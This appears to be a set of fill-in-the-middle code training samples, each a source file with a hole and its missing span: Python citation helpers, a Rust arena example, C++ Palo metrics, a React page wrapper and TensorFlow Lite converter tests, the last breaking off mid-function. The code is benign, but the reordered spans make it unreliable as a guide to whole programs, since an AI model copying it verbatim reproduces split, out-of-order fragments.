citation_text( citation_var, info, ref=ref, backward=should_add["backward"] ) + "\n" citations = ", citations='{}'".format(citation_file) text += "'''{});".format(citations) if text == "insert('''''');": text = "" if nwork and should_add["set"] and "(" not in dget(info, "pyref"): text += "\n" + changes_dict_to_set_attribute(dget(info, "pyref"), should_add["set"]) return { "code": text.strip(), "extra": config.check_insertion( nwork, info, citation_var, citation_file, should_add, ref="" ) } def should_add_info( info, citation, article=None, backward=False, citation_file=None, warning=lambda x: None, set_scholar=False, article_rules=None, bibtex_rules=None, add_citation=True ): """Check if there is anything to add for this info""" convert = ConvertDict(article_rules or config.ARTICLE_TO_INFO) info = convert.run(info, article=article) nwork = consume(info, "_nwork") should_add = { "add": False, "citation": citation, "set": {}, "backward": backward, } if not nwork or (not citation and add_citation): should_add["add"] = True should_add["citation"] = citation return should_add, nwork, info changes = set_by_info(nwork, info, set_scholar=set_scholar, rules=bibtex_rules or config.BIBTEX_TO_INFO) should_add["set"] = changes["set"] if should_add["set"]: should_add["add"] = True if add_citation: local_citation = find_local_citation( nwork, citation, backward, citation_file=citation_file, warning=warning ) if local_citation: should_add["citation"] = None else: should_add["add"] = True return should_add, nwork, info class Metakey(object): """Convert work or list of work to metakey .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> murta2014a @ Metakey() 'murta2014a' >>> [murta2014a] @ Metakey() ['murta2014a'] """ def __rmatmul__(self, x): if hasattr(x, "__iter__"): return [y @ self for y in x] return oget(x, "metakey") class MetakeyTitle(object): """Convert work or list of work to metakey - title .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> murta2014a @ MetakeyTitle() 'murta2014a - noWorkflow: capturing and analyzing provenance of scripts' >>> [murta2014a] @ MetakeyTitle() ['murta2014a - noWorkflow: capturing and analyzing provenance of scripts'] """ def __rmatmul__(self, x): if hasattr(x, "__iter__"): return [y @ self for y in x] return "{} - {}".format( oget(x, "metakey"), oget(x, "name"), ) class WDisplay(object): """Convert work or list of work to display .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> murta2014a @ WDisplay() 'no Work flow' >>> [murta2014a] @ WDisplay() ['no Work flow'] """ def __rmatmul__(self, x): if hasattr(x, "__iter__"): return [y @ self for y in x] return config.work_display(x) metakey = Metakey() metakey_title = MetakeyTitle() wdisplay = WDisplay() def check_config_deprecation(): if hasattr(config, "WORK_BIBTEX_MAP"): warnings.warn(textwrap.dedent("""The configuration config.WORK_BIBTEX_MAP is not supported anymore. It was replaced by config.WORK_TO_BIBTEX, which is more complete. Please, modify it according to your needs """)) if hasattr(config, "FORM_BUTTONS"): old_form_to_new(show_deprecation=True)<|fim▁end|>
Use acronym for place name: >>> print(work_to_bibtex(murta2014a, acronym=True))
<|file_name|>arena_storage_pool.rs<|end_file_name|><|fim▁begin|>// Implements http://rosettacode.org/wiki/Arena_storage_pool #![feature(rustc_private)] extern crate arena; <|fim▁hole|>fn main() { // Memory is allocated using the default allocator (currently jemalloc). The memory is // allocated in chunks, and when one chunk is full another is allocated. This ensures that // references to an arena don't become invalid when the original chunk runs out of space. The // chunk size is configurable as an argument to TypedArena::with_capacity if necessary. let arena = TypedArena::new(); // The arena crate contains two types of arenas: TypedArena and Arena. Arena is // reflection-basd and slower, but can allocate objects of any type. TypedArena is faster, and // can allocate only objects of one type. The type is determined by type inference--if you try // to allocate an integer, then Rust's compiler knows it is an integer arena. let v1 = arena.alloc(1i32); // TypedArena returns a mutable reference let v2 = arena.alloc(3); *v2 += 38; println!("{}", *v1 + *v2); // The arena's destructor is called as it goes out of scope, at which point it deallocates // everything stored within it at once. }<|fim▁end|>
use arena::TypedArena; #[cfg(not(test))]
<|file_name|>palo_metrics.cpp<|end_file_name|><|fim▁begin|>// Modifications copyright (C) 2017, Baidu.com, Inc. // Copyright 2017 The Apache Software Foundation // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. #include "util/palo_metrics.h" #include "util/debug_util.h" namespace palo { // Naming convention: Components should be separated by '.' and words should // be separated by '-'. const char* PALO_BE_START_TIME = "palo_be.start_time"; const char* PALO_BE_VERSION = "palo_be.version"; const char* PALO_BE_READY = "palo_be.ready"; const char* PALO_BE_NUM_FRAGMENTS = "palo_be.num_fragments"; const char* TOTAL_SCAN_RANGES_PROCESSED = "palo_be.scan_ranges.total"; const char* NUM_SCAN_RANGES_MISSING_VOLUME_ID = "palo_be.scan_ranges.num_missing_volume_id"; const char* MEM_POOL_TOTAL_BYTES = "palo_be.mem_pool.total_bytes"; const char* HASH_TABLE_TOTAL_BYTES = "palo_be.hash_table.total_bytes"; const char* OLAP_LRU_CACHE_LOOKUP_COUNT = "palo_be.olap.lru_cache.lookup_count"; const char* OLAP_LRU_CACHE_HIT_COUNT = "palo_be.olap.lru_cache.hit_count"; const char* PALO_PUSH_COUNT = "palo_be.olap.push_count"; const char* PALO_FETCH_COUNT = "palo_be.olap.fetch_count"; const char* PALO_REQUEST_COUNT = "palo_be.olap.request_count"; const char* BE_MERGE_DELTA_NUM = "palo_be.olap.be_merge.delta_num"; const char* BE_MERGE_SIZE = "palo_be.olap.be_merge_size"; const char* CE_MERGE_DELTA_NUM = "palo_be.olap.ce_merge.delta_num"; const char* CE_MERGE_SIZE = "palo_be.olap.ce_merge_size"; const char* IO_MGR_NUM_BUFFERS = "palo_be.io_mgr.num_buffers"; const char* IO_MGR_NUM_OPEN_FILES = "palo_be.io_mgr.num_open_files"; const char* IO_MGR_NUM_UNUSED_BUFFERS = "palo_be.io_mgr.num_unused_buffers"; // const char* IO_MGR_NUM_CACHED_FILE_HANDLES = "palo_be.io_mgr_num_cached_file_handles"; const char* IO_MGR_NUM_FILE_HANDLES_OUTSTANDING = "palo_be.io_mgr.num_file_handles_outstanding"; // const char* IO_MGR_CACHED_FILE_HANDLES_HIT_COUNT = "palo_be.io_mgr_cached_file_handles_hit_count"; // const char* IO_MGR_CACHED_FILE_HANDLES_MISS_COUNT = "palo_be.io_mgr_cached_file_handles_miss_count"; const char* IO_MGR_TOTAL_BYTES = "palo_be.io_mgr.total_bytes"; // const char* IO_MGR_BYTES_READ = "palo_be.io_mgr_bytes_read"; // const char* IO_MGR_LOCAL_BYTES_READ = "palo_be.io_mgr_local_bytes_read"; // const char* IO_MGR_CACHED_BYTES_READ = "palo_be.io_mgr_cached_bytes_read"; // const char* IO_MGR_SHORT_CIRCUIT_BYTES_READ = "palo_be.io_mgr_short_circuit_bytes_read"; const char* IO_MGR_BYTES_WRITTEN = "palo_be.io_mgr.bytes_written"; const char* NUM_QUERIES_SPILLED = "palo_be.num_queries_spilled"; // These are created by palo_be during startup. StringProperty* PaloMetrics::_s_palo_be_start_time = NULL; StringProperty* PaloMetrics::_s_palo_be_version = NULL; BooleanProperty* PaloMetrics::_s_palo_be_ready = NULL; IntCounter* PaloMetrics::_s_palo_be_num_fragments = NULL; IntCounter* PaloMetrics::_s_num_ranges_processed = NULL; IntCounter* PaloMetrics::_s_num_ranges_missing_volume_id = NULL; IntGauge* PaloMetrics::_s_mem_pool_total_bytes = NULL; IntGauge* PaloMetrics::_s_hash_table_total_bytes = NULL; IntCounter* PaloMetrics::_s_olap_lru_cache_lookup_count = NULL; IntCounter* PaloMetrics::_s_olap_lru_cache_hit_count = NULL; IntCounter* PaloMetrics::_s_palo_push_count = NULL; IntCounter* PaloMetrics::_s_palo_fetch_count = NULL; IntCounter* PaloMetrics::_s_palo_request_count = NULL; IntCounter* PaloMetrics::_s_be_merge_delta_num = NULL; IntCounter* PaloMetrics::_s_be_merge_size = NULL; IntCounter* PaloMetrics::_s_ce_merge_delta_num = NULL; IntCounter* PaloMetrics::_s_ce_merge_size = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_buffers = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_open_files = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_unused_buffers = NULL; // IntGauge* PaloMetrics::_s_io_mgr_num_cached_file_handles = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_file_handles_outstanding = NULL; // IntGauge* PaloMetrics::_s_io_mgr_cached_file_handles_hit_count = NULL; // IntGauge* PaloMetrics::_s_io_mgr_cached_file_handles_miss_count = NULL; IntGauge* PaloMetrics::_s_io_mgr_total_bytes = NULL; // IntGauge* PaloMetrics::_s_io_mgr_bytes_read = NULL; // IntGauge* PaloMetrics::_s_io_mgr_local_bytes_read = NULL; // IntGauge* PaloMetrics::_s_io_mgr_cached_bytes_read = NULL; // IntGauge* PaloMetrics::_s_io_mgr_short_circuit_bytes_read = NULL; IntCounter* PaloMetrics::_s_io_mgr_bytes_written = NULL; IntCounter* PaloMetrics::_s_num_queries_spilled = NULL; void PaloMetrics::create_metrics(MetricGroup* m) { // Initialize impalad metrics _s_palo_be_start_time = m->AddProperty<std::string>( PALO_BE_START_TIME, ""); _s_palo_be_version = m->AddProperty<std::string>( PALO_BE_VERSION, get_version_string(true)); _s_palo_be_ready = m->AddProperty(PALO_BE_READY, false); _s_palo_be_num_fragments = m->AddCounter(PALO_BE_NUM_FRAGMENTS, 0L); // Initialize scan node metrics _s_num_ranges_processed = m->AddCounter(TOTAL_SCAN_RANGES_PROCESSED, 0L); _s_num_ranges_missing_volume_id = m->AddCounter(NUM_SCAN_RANGES_MISSING_VOLUME_ID, 0L); // Initialize memory usage metrics _s_mem_pool_total_bytes = m->AddGauge(MEM_POOL_TOTAL_BYTES, 0L); _s_hash_table_total_bytes = m->AddGauge(HASH_TABLE_TOTAL_BYTES, 0L); // Initialize olap metrics _s_olap_lru_cache_lookup_count = m->AddCounter(OLAP_LRU_CACHE_LOOKUP_COUNT, 0L); _s_olap_lru_cache_hit_count = m->AddCounter(OLAP_LRU_CACHE_HIT_COUNT, 0L); // Initialize push_count, fetch_count, request_count metrics _s_palo_push_count = m->AddCounter(PALO_PUSH_COUNT, 0L); _s_palo_fetch_count = m->AddCounter(PALO_FETCH_COUNT, 0L); _s_palo_request_count = m->AddCounter(PALO_REQUEST_COUNT, 0L); // Initialize be/ce merge metrics _s_be_merge_delta_num = m->AddCounter(BE_MERGE_DELTA_NUM, 0L); _s_be_merge_size = m->AddCounter(BE_MERGE_SIZE, 0L); _s_ce_merge_delta_num = m->AddCounter(CE_MERGE_DELTA_NUM, 0L); _s_ce_merge_size = m->AddCounter(CE_MERGE_SIZE, 0L); // Initialize metrics relate to spilling to disk // _s_io_mgr_bytes_read // = m->AddGauge(IO_MGR_BYTES_READ, 0L); // _s_io_mgr_local_bytes_read<|fim▁hole|> // = m->AddGauge(IO_MGR_SHORT_CIRCUIT_BYTES_READ, 0L); _s_io_mgr_bytes_written = m->AddCounter(IO_MGR_BYTES_WRITTEN, 0L); _s_io_mgr_num_buffers = m->AddGauge(IO_MGR_NUM_BUFFERS, 0L); _s_io_mgr_num_open_files = m->AddGauge(IO_MGR_NUM_OPEN_FILES, 0L); _s_io_mgr_num_unused_buffers = m->AddGauge(IO_MGR_NUM_UNUSED_BUFFERS, 0L); _s_io_mgr_num_file_handles_outstanding = m->AddGauge(IO_MGR_NUM_FILE_HANDLES_OUTSTANDING, 0L); _s_io_mgr_total_bytes = m->AddGauge(IO_MGR_TOTAL_BYTES, 0L); _s_num_queries_spilled = m->AddCounter(NUM_QUERIES_SPILLED, 0L); } }<|fim▁end|>
// = m->AddGauge(IO_MGR_LOCAL_BYTES_READ, 0L); // _s_io_mgr_cached_bytes_read // = m->AddGauge(IO_MGR_CACHED_BYTES_READ, 0L); // _s_io_mgr_short_circuit_bytes_read
<|file_name|>page-wrap.tsx<|end_file_name|><|fim▁begin|>import { FC, createElement as h } from 'react'; import { PageProps } from '@not-govuk/app-composer'; import { Page } from '@hods/components'; import './app.scss'; export const PageWrap: FC<PageProps> = ({ routes, children }) => { const compare = (a, b) => ( a.href > b.href<|fim▁hole|> : -1 ); const navigation = routes .map(e => ({ href: e.href, text: e.title })) .sort(compare); return ( <Page footerNavigation={navigation} navigation={navigation} title="My new service" > {children} </Page> ); }; export default PageWrap;<|fim▁end|>
? 1
<|file_name|>lite_test.py<|end_file_name|><|fim▁begin|># Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for lite.py.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import tempfile import numpy as np from tensorflow.contrib.lite.python import lite from tensorflow.contrib.lite.python import lite_constants from tensorflow.contrib.lite.python.interpreter import Interpreter from tensorflow.python import keras from tensorflow.python.client import session from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import test_util from tensorflow.python.ops import array_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import variable_scope from tensorflow.python.ops.variables import global_variables_initializer as _global_variables_initializer from tensorflow.python.platform import gfile from tensorflow.python.platform import resource_loader from tensorflow.python.platform import test from tensorflow.python.saved_model import saved_model from tensorflow.python.training.training_util import write_graph class FromConstructor(test_util.TensorFlowTestCase): # Tests invalid constructors using a dummy value for the GraphDef. def testInvalidConstructor(self): message = ('If input_tensors and output_tensors are None, both ' 'input_arrays_with_shape and output_arrays must be defined.') # `output_arrays` is not defined. with self.assertRaises(ValueError) as error: lite.TocoConverter( None, None, [], input_arrays_with_shape=[('input', [3, 9])]) self.assertEqual(message, str(error.exception)) # `input_arrays_with_shape` is not defined. with self.assertRaises(ValueError) as error: lite.TocoConverter(None, [], None, output_arrays=['output']) self.assertEqual(message, str(error.exception)) # Tests valid constructors using a dummy value for the GraphDef. def testValidConstructor(self): converter = lite.TocoConverter( None, None, None, input_arrays_with_shape=[('input', [3, 9])], output_arrays=['output']) self.assertFalse(converter._has_valid_tensors()) self.assertEqual(converter.get_input_arrays(), ['input']) with self.assertRaises(ValueError) as error: converter._set_batch_size(1) self.assertEqual( 'The batch size cannot be set for this model. Please use ' 'input_shapes parameter.', str(error.exception)) converter = lite.TocoConverter(None, ['input_tensor'], ['output_tensor']) self.assertTrue(converter._has_valid_tensors()) class FromSessionTest(test_util.TensorFlowTestCase): def testFloat(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details))<|fim▁hole|> self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testQuantization(self): in_tensor_1 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA') in_tensor_2 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB') out_tensor = array_ops.fake_quant_with_min_max_args( in_tensor_1 + in_tensor_2, min=0., max=1., name='output') sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session( sess, [in_tensor_1, in_tensor_2], [out_tensor]) converter.inference_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = { 'inputA': (0., 1.), 'inputB': (0., 1.) } # mean, std_dev tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.uint8, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((1., 0.), input_details[0]['quantization']) # scale, zero_point self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.uint8, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((1., 0.), input_details[1]['quantization']) # scale, zero_point output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('output', output_details[0]['name']) self.assertEqual(np.uint8, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertTrue(output_details[0]['quantization'][0] > 0) # scale def testQuantizationInvalid(self): in_tensor_1 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA') in_tensor_2 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB') out_tensor = array_ops.fake_quant_with_min_max_args( in_tensor_1 + in_tensor_2, min=0., max=1., name='output') sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session( sess, [in_tensor_1, in_tensor_2], [out_tensor]) converter.inference_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev with self.assertRaises(ValueError) as error: converter.convert() self.assertEqual( 'Quantization input stats are not available for input tensors ' '\'inputB\'.', str(error.exception)) def testSizeNoneInvalid(self): in_tensor = array_ops.placeholder(dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Test invalid shape. None after 1st dimension. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) with self.assertRaises(ValueError) as error: converter.convert() self.assertEqual('Provide an input shape for input array \'Placeholder\'.', str(error.exception)) def testBatchSizeInvalid(self): in_tensor = array_ops.placeholder( shape=[1, None, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Test invalid shape. None after 1st dimension. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) with self.assertRaises(ValueError) as error: converter.convert() self.assertEqual( 'None is only supported in the 1st dimension. Tensor ' '\'Placeholder\' has invalid shape \'[1, None, 16, 3]\'.', str(error.exception)) def testBatchSizeValid(self): in_tensor = array_ops.placeholder( shape=[None, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testFreezeGraph(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) var = variable_scope.get_variable( 'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + var sess = session.Session() sess.run(_global_variables_initializer()) # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # TODO(nupurgarg): Verify value of contents in GraphViz. def testGraphviz(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.output_format = lite_constants.GRAPHVIZ_DOT graphviz_output = converter.convert() self.assertTrue(graphviz_output) # TODO(nupurgarg): Verify value of contents in GraphViz. def testDumpGraphviz(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) graphviz_dir = self.get_temp_dir() converter.dump_graphviz_dir = graphviz_dir tflite_model = converter.convert() self.assertTrue(tflite_model) # Ensure interpreter is able to allocate and check graphviz data. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() num_items_graphviz = len(os.listdir(graphviz_dir)) self.assertTrue(num_items_graphviz) # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) graphviz_dir = self.get_temp_dir() converter.dump_graphviz_dir = graphviz_dir converter.dump_graphviz_video = True tflite_model = converter.convert() self.assertTrue(tflite_model) # Ensure graphviz folder has more data after using video flag. num_items_graphviz_video = len(os.listdir(graphviz_dir)) self.assertTrue(num_items_graphviz_video > num_items_graphviz) def testInferenceInputType(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.inference_input_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.uint8, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((1., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) def testDefaultRangesStats(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.inference_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev converter.default_ranges_stats = (0, 6) # min, max tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.uint8, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((1., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.uint8, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertTrue(output_details[0]['quantization'][0] > 0) # scale def testPostTrainingQuantize(self): np.random.seed(0) # We need the tensor to have more than 1024 elements for quantize_weights # to kick in. Thus, the [33, 33] shape. in_tensor_1 = array_ops.placeholder( shape=[33, 33], dtype=dtypes.float32, name='inputA') in_tensor_2 = constant_op.constant( np.random.uniform(low=-10., high=10., size=(33, 33)), shape=[33, 33], dtype=dtypes.float32, name='inputB') out_tensor = math_ops.matmul(in_tensor_1, in_tensor_2, name='output') sess = session.Session() # Convert float model. float_converter = lite.TocoConverter.from_session(sess, [in_tensor_1], [out_tensor]) float_tflite = float_converter.convert() self.assertTrue(float_tflite) # Convert quantized weights model. quantized_converter = lite.TocoConverter.from_session( sess, [in_tensor_1], [out_tensor]) quantized_converter.post_training_quantize = True quantized_tflite = quantized_converter.convert() self.assertTrue(quantized_tflite) # Ensure that the quantized weights tflite model is smaller. self.assertTrue(len(quantized_tflite) < len(float_tflite)) def testExtendedMode(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.converter_mode = lite.ConverterMode.TOCO_EXTENDED_ALL tflite_model = converter.convert() self.assertTrue(tflite_model) # Ensures the model contains TensorFlow ops. # TODO(nupurgarg): Check values once there is a Python delegate interface. interpreter = Interpreter(model_content=tflite_model) with self.assertRaises(RuntimeError) as error: interpreter.allocate_tensors() self.assertIn( 'Regular TensorFlow ops are not supported by this interpreter. Make ' 'sure you invoke the Eager delegate before inference.', str(error.exception)) class FromFrozenGraphFile(test_util.TensorFlowTestCase): def testFloat(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + in_tensor sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb') write_graph(sess.graph_def, '', graph_def_file, False) sess.close() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testFloatWithShapesArray(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + in_tensor sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb') write_graph(sess.graph_def, '', graph_def_file, False) sess.close() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_frozen_graph( graph_def_file, ['Placeholder'], ['add'], input_shapes={'Placeholder': [1, 16, 16, 3]}) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) def testFreezeGraph(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) var = variable_scope.get_variable( 'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + var sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb') write_graph(sess.graph_def, '', graph_def_file, False) sess.close() # Ensure the graph with variables cannot be converted. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) self.assertEqual('Please freeze the graph using freeze_graph.py.', str(error.exception)) def testPbtxt(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + in_tensor sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pbtxt') write_graph(sess.graph_def, '', graph_def_file, True) sess.close() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testInvalidFileNotFound(self): with self.assertRaises(IOError) as error: lite.TocoConverter.from_frozen_graph('invalid_file', ['Placeholder'], ['add']) self.assertEqual('File \'invalid_file\' does not exist.', str(error.exception)) def testInvalidFileBadData(self): graph_def_file = os.path.join(self.get_temp_dir(), 'invalid_file') with gfile.Open(graph_def_file, 